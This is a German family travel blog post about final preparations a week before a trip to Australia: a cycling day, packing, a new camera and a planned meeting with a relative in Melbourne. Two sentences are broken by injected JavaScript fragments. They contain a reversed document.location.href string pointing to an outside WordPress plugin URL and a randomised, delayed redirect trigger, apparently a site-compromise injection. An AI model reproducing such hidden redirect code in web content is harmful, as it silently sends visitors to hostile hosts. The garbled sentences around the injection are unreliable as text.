eine Woche vorher

Eine Woche noch! Die nächsten sieben Tage werden wie im Flug umgehen. Dann geht die Reise los. Heute haben wir noch ein wenig trainiert, damit wir ein bisschen fitter für die anstrengende Zeit in Australien werden. Da hat sich der Radwandertag mehr als angeboten. Weil das Wetter auch recht gut war, haben wir uns auf unsere Räder geschwungen und sind zunächst einmal auf den Buttermarkt gefahren, um unsere obligatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torische Stempelkarte abzuholen. Es gilt ja ein Rad zu gewinnen. Die 25 km haben wir dann auch erfolgreich in 1:48h geschafft.Route_Radwandertag

Zwischenzeitlich habe ich dann auch noch eine Seite eingefügt, auf der ihr immer unsere aktuelle Position in Australien sehen könnt … wenn das Handy eingeschaltet ist und eine Verbindung zum Internet hat. Schaut einfach mal, wo wir uns gerade aufhalten! Interessante Strecken, wie oben die Strecke der Radtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour,  werden wir aber nochmal extra veröffentlichen.

Damit wir unsere Reise auch auf Video festhalten können, habe ich uns am Samstag noch eine Kamera bei eBay-Kleinanzeigen organisiert. Gerne hätte ich damit herum gespielt, Anja wollte aber lieber die Koffer zu Ende packen. So muss ich sie jetzt im Laufe der Woche ausprobieren, aber dann wird auch nicht viel Zeit dafür bleiben. Lea und Tim  müssen noch ihre Sachen packen, da die beiden den ersten Teil der Ferien bei meinen Eltern auf dem Campingplatz verbringen möchten. Und eine ToDo-Liste hab ich auch noch aus Kempen mit genommen.

Zuletzt muss ich meinen entfernten Verwandten Karl in Melbourne anschreiben, da wir uns mit ihm am 12. Juli treffen wollen. Karl und ich haben den selben Urgroßvater, er ist der Sohn von Charles, dem Bruder meiner Oma. Dahinter steckt eine interessante Familiengeschichte, die ich auch erst 2006 erfahren habe. Aber darüber können wir dann berichten, wenn wir Karl in Melbourne getroffen haben.

Es gilt also noch einiges zu organisieren, bis die Ferien beginnen …

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert